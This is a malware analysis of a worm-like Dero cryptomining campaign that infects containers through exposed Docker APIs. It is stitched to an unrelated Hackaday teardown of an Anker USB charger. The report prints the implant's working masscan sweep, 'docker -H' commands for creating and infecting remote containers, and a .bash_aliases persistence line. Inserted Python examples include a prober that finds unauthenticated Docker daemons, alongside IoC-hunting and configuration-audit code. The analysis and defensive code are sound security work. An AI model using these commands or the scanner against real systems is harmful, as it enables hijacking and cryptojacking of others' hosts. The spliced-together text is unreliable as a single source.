


Introduction


Imagine a container zombie outbreak where a single infected container scans the internet for an exposed Docker API and “bites” it, exploiting it to create new malicious containers and compromise the running ones, thus transforming them into new “zombies” that mine Dero and go on to “bite” new victims. No command-and-control server is required for delivery, just an exponentially growing number of victims that automatically infect new ones. That’s exactly what the new Dero mining campaign does.

During a recent compromise assessment project, we detected a number of running containers with malicious activities. Some of the containers were previously recognized, while others were not. After forensically analyzing the containers, we confirmed that a threat actor was able to gain initial access to a running containerized infrastructure by exploiting an insecurely published Docker API. This led to the running containers being compromised and new ones being created not only to hijack the victim’s resources for cryptocurrency mining but also to launch external attacks to propagate to other networks. The diagram below describes the attack vector:

Infection chain

The entire attack vector is automated via two malware implants: the previously unknown propagation malware nginx and the Dero crypto miner. Both samples are written in Golang and packed with UPX. Kaspersky products detect these malicious implants with the following verdicts:

  • nginx: Trojan.Linux.Agent.gen;
  • Dero crypto miner: RiskTool.Linux.Miner.gen.


nginx: the propagation malware


This malware is responsible for maintaining the persistence of the crypto miner and its further propagation to external systems. This implant is designed to minimize interaction with the operator and does not require a delivery C2 server. nginx ensures that the malware spreads as long as there are users insecurely publishing their Docker APIs on the internet.

The malware is named “nginx” to masquerade as the well-known legitimate nginx web server software in an attempt to evade detection by users and security tools. In this post, we’ll refer to this malware as “nginx”.

After unpacking the nginx malware, we parsed the metadata of the Go binary and were able to determine the location of the Go source code file at compilation time: “/root/shuju/docker2375/nginx.go”.

Nginx source code file

Infecting the container


The malware starts by creating a log file at “/var/log/nginx.log”.

Log file creation

This log file will be used later to log the running activities of the malware, including data like the list of infected machines, the names of created malicious containers on those machines, and the exit status code if there were any errors.

Malware operations log

After that, in a new process, a function called main.checkVersion loops infinitely to make sure that the content of a file located at “/usr/bin/version.dat” inside the compromised container always equals 1.4. If the file contents were changed, this function overwrites them.

Ensuring that version.dat exists and contains 1.4

If version.dat doesn’t exist, the malicious function creates this file with the content 1.4, then sleeps for 24 hours before the next iteration.

Creating version.dat if it doesn't exist

The malware uses the version.dat file to identify already infected containers, as we’ll describe later.

The nginx sample then executes the main.monitorCloudProcess function, which loops infinitely in a new process to make sure that a process named cloud, the Dero miner, is running. First, the malware checks whether the cloud process is running. If it is not, nginx executes the main.startCloudProcess function to launch the miner.

Monitoring and executing the cloud process

In order to execute the miner, the main.startCloudProcess function attempts to locate it at “/usr/bin/cloud”.

Executing the miner

Spreading the infection
Host search


Next, nginx enters an infinite loop in which the main.generateRandomSubnet function generates random IPv4 /16 subnets to scan, so that the malware can compromise more networks.

Infinite loop of subnet generation and scanning

The subnets with their respective IP ranges are passed to the main.scanSubnet function, which scans them with masscan, a port scanning tool the malware installs in the container (described in more detail later). The scanner looks for insecurely published Docker APIs by running masscan -p 2375 <subnet> -oL - --max-rate 360 against the generated subnet: port 2375 is the Docker daemon’s conventional plaintext TCP port, -oL - writes list-format output to stdout for parsing, and --max-rate caps the scan at 360 packets per second.

Scanning the generated subnet via masscan

The output of masscan is parsed via regex to extract the IPv4s that have the default Docker API port 2375 open. The extracted IPv4s are then passed to the main.checkDockerDaemon function, which checks whether the remote dockerd daemon on that host is running and responsive. To do this, the malware attempts to list all running containers on the remote host with a docker -H <host> ps command. If that fails, nginx moves on to the next IPv4.

Remotely listing running containers
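As an added example (not code from the report or from the malware), here is the same two-step host search done in Python from the defender’s side: parse masscan’s list-format output for hosts with tcp/2375 open, then confirm which of them answer unauthenticated Docker Engine API calls, which is what docker -H <host> ps does underneath (GET /containers/json). The masscan sample and the offline_fetch stand-in are constructed; the addresses are RFC 5737 documentation ranges. Pointed at your own address space with the real fetch, it finds exactly the hosts this campaign would find.

```python
from __future__ import annotations

import json
import re
from urllib.request import urlopen

# Constructed sample of masscan "-oL" list output (not captured from the
# campaign). Format: a "#masscan" header, one "<state> <proto> <port> <ip>
# <timestamp>" record per result, and a trailing "# end" marker.
SAMPLE_MASSCAN_LIST = """#masscan
open tcp 2375 203.0.113.7 1716300000
open tcp 2375 198.51.100.23 1716300004
closed tcp 2375 203.0.113.8 1716300005
# end
"""

# The same filter the malware applies with a regex: keep only records that
# report tcp/2375 open and pull the IPv4 address out of them.
_OPEN_2375 = re.compile(r"^open\s+tcp\s+2375\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+$")


def parse_masscan_list(text: str) -> list[str]:
    """Return the IPv4 addresses that masscan reported with tcp/2375 open."""
    hosts = []
    for line in text.splitlines():
        m = _OPEN_2375.match(line.strip())
        if m:
            hosts.append(m.group(1))
    return hosts


def http_fetch(url: str, timeout: float = 3.0) -> bytes:
    """Plain HTTP, no TLS, no credentials: that is precisely the exposure."""
    with urlopen(url, timeout=timeout) as resp:
        return resp.read()


def offline_fetch(url: str, timeout: float = 3.0) -> bytes:
    """Constructed stand-in for http_fetch so the example runs without a network:
    one host answers like an exposed daemon, everything else refuses."""
    if url.startswith("http://203.0.113.7:2375/"):
        return b'[{"Names": ["/abcdefghijkl"], "Image": "ubuntu:18.04"}]'
    raise OSError("connection refused")


def check_docker_daemon(host: str, port: int = 2375, fetch=http_fetch) -> list[str] | None:
    """Equivalent of the malware's `docker -H <host>:2375 ps` probe, done
    directly against the Engine API. Returns the running container names if
    the daemon answers without any authentication, or None if nothing
    Docker-like answers (connection error, non-JSON, non-list body)."""
    try:
        containers = json.loads(fetch(f"http://{host}:{port}/containers/json"))
    except (OSError, ValueError):  # URLError/timeout are OSError; bad JSON is ValueError
        return None
    if not isinstance(containers, list):
        return None
    names = []
    for c in containers:
        if isinstance(c, dict):
            names.extend(n.lstrip("/") for n in c.get("Names", []))
    return names


def find_exposed(masscan_output: str, fetch=http_fetch) -> dict[str, list[str]]:
    """Chain both steps: hosts with 2375 open that also speak the Docker API."""
    exposed = {}
    for host in parse_masscan_list(masscan_output):
        names = check_docker_daemon(host, fetch=fetch)
        if names is not None:
            exposed[host] = names
    return exposed


if __name__ == "__main__":
    # Offline run; swap offline_fetch for http_fetch to probe real scan output.
    print(find_exposed(SAMPLE_MASSCAN_LIST, fetch=offline_fetch))
```

A daemon that returns an empty list is still reported (as an empty name list): it is responsive and unauthenticated, which is all the malware needs to create its first container there.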

Container creation


After confirming that the remote dockerd daemon is running and responsive, nginx generates a container name with 12 random characters and uses it to create a malicious container on the remote target.

Container name generation

The malicious container is created with docker -H <host> run -dt --name <name> --restart always ubuntu:18.04 /bin/bash. The --restart always policy makes the Docker daemon bring the container back up whenever it exits, and again after the daemon itself restarts, so the implant survives reboots of the host.

Malicious container created on a new host

Then nginx prepares the new container for installing dependencies by refreshing its package index with docker -H <host> exec <container> apt-get -yq update.

Updating container packages

Next, the malicious sample runs docker -H <host> exec <container> apt-get install -yq masscan docker.io to install masscan and docker.io in the container. These are the malware’s two dependencies: the docker.io package supplies the docker client it uses to talk to remote daemons, and masscan performs the external scan that finds new networks to infect.

Remotely installing the malware dependencies inside the newly created container

Then it transfers the two malicious implants, nginx and cloud, into the container by executing docker -H <host> cp -L /usr/bin/<implant> <container>:/usr/bin for each of them (-L follows symlinks, so the actual binary is copied).

Transferring nginx and cloud to the newly created container

The malware maintains persistence by writing a line that launches the transferred nginx binary into /root/.bash_aliases, so that it is executed automatically whenever a shell is opened in the container. This is done via docker -H <host> exec <container> bash --norc -c 'echo "/usr/bin/nginx &" > /root/.bash_aliases'. Note that the > redirect replaces any previous contents of the file rather than appending to it.

Adding the nginx malware to .bash_aliases for persistence

Compromising running containers


Up until this point, the malware has only created new malicious containers. Now it tries to compromise existing running containers based on ubuntu:18.04. The sample first executes the main.checkAndOperateContainers function, which checks every running container on the remote vulnerable host for two conditions: it is based on ubuntu:18.04, and it does not contain a version.dat file (the presence of which indicates that the container has already been infected).

Listing and compromising existing containers on the remote target

If these conditions are satisfied, the malware executes the main.operateOnContainer function to proceed with the same attack vector described earlier to infect the running container. The infection chain is repeated, hijacking the container resources to scan and compromise more containers and mining for the Dero cryptocurrency.

That way, the malware does not require a C2 connection and also maintains its activity as long as there is an insecurely published Docker API that can be exploited to compromise running containers and create new ones.
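The container metadata and file-system artefacts described above are enough to hunt for this infection without waiting for a hash match. The following is an added example (not the report’s or Kaspersky’s code): it triages one docker inspect record for the traits of an attacker-created container and checks a container root filesystem for the path IoCs, hashing anything found at the implant paths against the MD5s from the IoC list. The inspect sample and the rootfs it scans are constructed; the 12-character alphanumeric name pattern is an assumption, since the report does not say which alphabet the malware draws from.

```python
from __future__ import annotations

import hashlib
import json
import re
import tempfile
from pathlib import Path

# MD5 hashes of the two implants, from the report's IoC list (lowercased).
IOC_MD5 = {
    "094085675570a18a9225399438471cc9": "nginx",
    "14e7fb298049a57222254ef0f47464a7": "cloud",
}
# The malware names containers with 12 random characters; the exact alphabet
# is not given in the report, so alphanumerics are assumed here.
RANDOM_NAME = re.compile(r"^[A-Za-z0-9]{12}$")

# Constructed `docker inspect` excerpt (not real telemetry), shaped like a
# container created by `run -dt --name <name> --restart always ubuntu:18.04 /bin/bash`.
SAMPLE_INSPECT = json.loads("""{
  "Name": "/k3vq8zt1yh2a",
  "Config": {"Image": "ubuntu:18.04", "Cmd": ["/bin/bash"], "Tty": true},
  "HostConfig": {"RestartPolicy": {"Name": "always"}}
}""")


def triage_container(inspect: dict) -> list[str]:
    """Flag the traits the campaign leaves in container metadata. None is
    conclusive alone; together they single out attacker-created containers."""
    findings = []
    cfg = inspect.get("Config", {})
    host_cfg = inspect.get("HostConfig", {})
    if cfg.get("Image") == "ubuntu:18.04":
        findings.append("image ubuntu:18.04 (the base the malware creates and targets)")
    if host_cfg.get("RestartPolicy", {}).get("Name") == "always":
        findings.append("restart policy 'always' (set on attacker-created containers)")
    if RANDOM_NAME.match(inspect.get("Name", "").lstrip("/")):
        findings.append("12-character random-looking container name")
    if cfg.get("Cmd") == ["/bin/bash"] and cfg.get("Tty"):
        findings.append("started as an idle interactive bash (`run -dt ... /bin/bash`)")
    return findings


def scan_rootfs(root: Path) -> list[str]:
    """Check a container's (merged) root filesystem for the file IoCs."""
    findings = []
    ver = root / "usr/bin/version.dat"
    if ver.is_file() and ver.read_text().strip() == "1.4":
        findings.append("/usr/bin/version.dat contains 1.4 (infection marker)")
    aliases = root / "root/.bash_aliases"
    if aliases.is_file() and "/usr/bin/nginx" in aliases.read_text():
        findings.append("/root/.bash_aliases launches /usr/bin/nginx (persistence)")
    for rel in ("usr/bin/nginx", "usr/bin/cloud"):
        path = root / rel
        if path.is_file():
            digest = hashlib.md5(path.read_bytes()).hexdigest()
            if digest in IOC_MD5:
                findings.append(f"/{rel}: MD5 {digest} matches IoC ({IOC_MD5[digest]})")
            else:
                # Path-only hit. The Debian/Ubuntu nginx package puts its binary in
                # /usr/sbin, so /usr/bin/nginx deserves a look, but the report warns
                # the path IoCs can false-positive: hash before calling it malicious.
                findings.append(f"/{rel} present, MD5 {digest} not in IoC list")
    if (root / "var/log/nginx.log").is_file():
        findings.append("/var/log/nginx.log present (malware operations log)")
    return findings


def make_constructed_rootfs(base: Path) -> Path:
    """Build a fake infected rootfs under `base` for an offline run (constructed)."""
    (base / "usr/bin").mkdir(parents=True)
    (base / "root").mkdir()
    (base / "var/log").mkdir(parents=True)
    (base / "usr/bin/version.dat").write_text("1.4\n")
    (base / "usr/bin/nginx").write_bytes(b"not the real implant")
    (base / "root/.bash_aliases").write_text("/usr/bin/nginx &\n")
    (base / "var/log/nginx.log").write_text("constructed\n")
    return base


def demo() -> tuple[list[str], list[str]]:
    """Run both checks against the constructed samples; returns (metadata, rootfs) findings."""
    with tempfile.TemporaryDirectory() as tmp:
        fs_findings = scan_rootfs(make_constructed_rootfs(Path(tmp)))
    return triage_container(SAMPLE_INSPECT), fs_findings


if __name__ == "__main__":
    for section in demo():
        print("\n".join(section))
```

On a live host, feed triage_container the output of docker inspect for each container and scan_rootfs the container’s merged overlay directory (or a docker export). Because the sample binary in the constructed rootfs is not the real implant, the run shows the path-only branch, which is the case that needs a human decision.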

cloud – the Dero miner


Executing and maintaining cloud, the crypto miner, is the primary goal of the nginx sample. The miner is also written in Golang and packed with UPX. After unpacking the binary, we were able to attribute it to the open-source DeroHE CLI miner project found on GitHub. The threat actor wrapped the DeroHE CLI miner into the cloud malware, with a hardcoded mining configuration: a wallet address and a DeroHE node (derod) address.

If no addresses are passed as arguments, which is the case in this campaign, the cloud malware falls back to a hardcoded, encrypted default configuration. It is stored as a Base64-encoded string that, once decoded, yields an AES-CTR encrypted blob containing a Base64-encoded wallet address, which is decrypted with the main.decrypt function. The configuration encryption suggests the threat actors are trying to make the malware more sophisticated, as we haven’t seen this in previous campaigns.

Decrypting the crypto wallet address

After decoding and decrypting this string, we uncovered the wallet address in clear text: dero1qyy8xjrdjcn2dvr6pwe40jrl3evv9vam6tpx537vux60xxkx6hs7zqgde993y.

Behavioral analysis of the decryption function

The malware then decrypts another two hardcoded AES-CTR encrypted strings, via a function named main.sockz, to obtain the Dero node addresses.

Function calls to decrypt the addresses

The node addresses are encrypted the same way the wallet address is, but with other keys. After decryption, we were able to obtain the following addresses: d.windowsupdatesupport[.]link and h.wiNdowsupdatesupport[.]link.

Decoded addresses in memory

The same wallet address and derod node addresses had been observed before in a campaign that targeted Kubernetes clusters with anonymous authentication enabled on the Kubernetes API. Instead of transferring the malware into a compromised container, that threat actor pulled a malicious image named pauseyyf/pause:latest, published on Docker Hub and containing the miner, and used it to create the malicious container. Unlike the current campaign, that attack was meant to be stealthy: the threat actors did not attempt to move laterally or scan the internet to compromise more networks. Those attacks were seen throughout 2023 and 2024 with minor changes in technique.

Takeaways


Although attacks on containers are less frequent than on other systems, they are no less dangerous. In the case we analyzed, containerized environments were compromised through a combination of a previously known miner and a new sample that created malicious containers and infected existing ones. The two malicious implants spread without a C2 server, making any network with containerized infrastructure and a Docker API insecurely published to the internet a potential target.

A Shodan search shows that in April 2025 there were 520 Docker APIs published over port 2375 worldwide. This highlights the potentially destructive consequences of the described threat and emphasizes the need for thorough monitoring and container protection.

Docker APIs published over port 2375 worldwide, January–April 2025 (chart)

Building your containerized infrastructure from known legitimate images alone doesn’t guarantee security. Just like any other system, containerized applications can be compromised at runtime, so it’s crucial to monitor your containerized infrastructure with efficient monitoring tools like Kaspersky Container Security. It detects misconfigurations and monitors registry images, ensuring the safety of container environments. We also recommend proactively hunting for threats to detect stealthy malicious activities and incidents that might have slipped unnoticed on your network. The Kaspersky Compromise Assessment service can help you not only detect such incidents, but also remediate them and provide immediate and effective incident response activities.
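The root cause in every step above is the same: a Docker Engine API reachable over plain TCP with no client authentication, which hands anyone who can reach the port root-equivalent control of the host (run, exec, cp). As an added example (not from the report), here is the weak daemon.json beside a hardened one, with a small audit that flags the difference in either daemon.json or a running dockerd command line. The file contents, command line and certificate paths are constructed.

```python
from __future__ import annotations

import json
import shlex
from urllib.parse import urlsplit

# Constructed daemon.json samples (not taken from the report). WEAK is the
# exposure the campaign scans for: the Engine API bound on every interface on
# the conventional plaintext port 2375 with no TLS client authentication.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

# Hardened: TLS with client-certificate verification ("tlsverify"), on the
# conventional TLS port 2376. "tls": true alone only encrypts; it does not
# authenticate the caller. Certificate paths are illustrative.
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

# The same weakness as a dockerd command line (e.g. from `ps -o args`).
WEAK_CMDLINE = "dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375"

WILDCARD_BINDS = {"0.0.0.0", "::"}


def audit_hosts(hosts: list[str], tlsverify: bool) -> list[tuple[str, str]]:
    """Rate each listener; returns (severity, endpoint) pairs."""
    findings = []
    for host in hosts:
        if "://" not in host:
            host = "tcp://" + host  # dockerd treats a bare host:port as tcp
        parts = urlsplit(host)
        if parts.scheme != "tcp":
            continue  # unix:// and fd:// are local to the host
        if not tlsverify:
            # Anyone who can reach the port owns the host: run/exec/cp as root.
            findings.append(("CRITICAL", host))
        elif parts.hostname is None or parts.hostname in WILDCARD_BINDS:
            # Authenticated, but still internet-facing: also restrict at the network layer.
            findings.append(("INFO", host))
    return findings


def audit_daemon_json(text: str) -> list[tuple[str, str]]:
    cfg = json.loads(text)
    return audit_hosts(cfg.get("hosts", []), bool(cfg.get("tlsverify", False)))


def audit_cmdline(cmdline: str) -> list[tuple[str, str]]:
    """Parse dockerd's -H/--host and --tlsverify flags from its argv."""
    argv = shlex.split(cmdline)
    hosts: list[str] = []
    tlsverify = False
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 2
            continue
        if arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    return audit_hosts(hosts, tlsverify)


if __name__ == "__main__":
    print("weak daemon.json:    ", audit_daemon_json(WEAK_DAEMON_JSON))
    print("hardened daemon.json:", audit_daemon_json(HARDENED_DAEMON_JSON))
    print("weak command line:   ", audit_cmdline(WEAK_CMDLINE))
```

One caveat when applying the hardened file: on systemd-managed installs the stock unit already starts dockerd with -H fd://, and a hosts key in daemon.json then conflicts with that flag and the daemon refuses to start; the fix is a unit drop-in that clears the -H flag, not removing the key. Even with tlsverify in place, keep the port off the public internet with a firewall or by binding to an internal address, which is why the audit still reports a wildcard bind as INFO.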

Indicators of compromise


File hashes
094085675570A18A9225399438471CC9 nginx
14E7FB298049A57222254EF0F47464A7 cloud

File paths
NOTE: Certain file path IoCs may lead to false positives due to the masquerading technique used.
/usr/bin/nginx
/usr/bin/cloud
/var/log/nginx.log
/usr/bin/version.dat

Derod node addresses
d.windowsupdatesupport[.]link
h.wiNdowsupdatesupport[.]link

Dero wallet address
dero1qyy8xjrdjcn2dvr6pwe40jrl3evv9vam6tpx537vux60xxkx6hs7zqgde993y


securelist.com/dero-miner-infe…


Fault Analysis of a 120W Anker GaNPrime Charger


Taking a break from his usual prodding at suspicious AliExpress USB chargers, [DiodeGoneWild] recently had a gander at what used to be a good USB charger.
The Anker 737 USB charger prior to its autopsy. (Credit: DiodeGoneWild, YouTube)
Before it went completely dead, the Anker 737 GaNPrime USB charger which a viewer sent him was capable of up to 120 Watts combined across its two USB-C and one USB-A outputs. Naturally the charger’s enclosure couldn’t be opened non-destructively, and it turned out to have (soft) potting compound filling up the voids, making it a treat to diagnose. Suffice it to say that these devices are not designed to be repaired.

With it being an autopsy, the unit was broken down into its individual PCBs, and a short was detected that eventually got traced to an IC marked ‘SW3536’, one of the ICs that communicates with the connected USB device to negotiate the voltage. That one shorted IC appears to have turned the entire charger into an expensive paperweight.

Since the charger was already in pieces, the rest of the circuit and its ICs were also analyzed. Here the gallium nitride (GaN) part was found in the Navitas GaNFast NV6136A FET with integrated gate driver, along with an Infineon CoolGaN IGI60F1414A1L integrated power stage. Unfortunately all of the cool technology was rendered useless by one component developing a short, even if it made for a fascinating look inside one of these very chonky USB chargers.

youtube.com/embed/-JV5VGO55-I?…


hackaday.com/2025/05/21/fault-…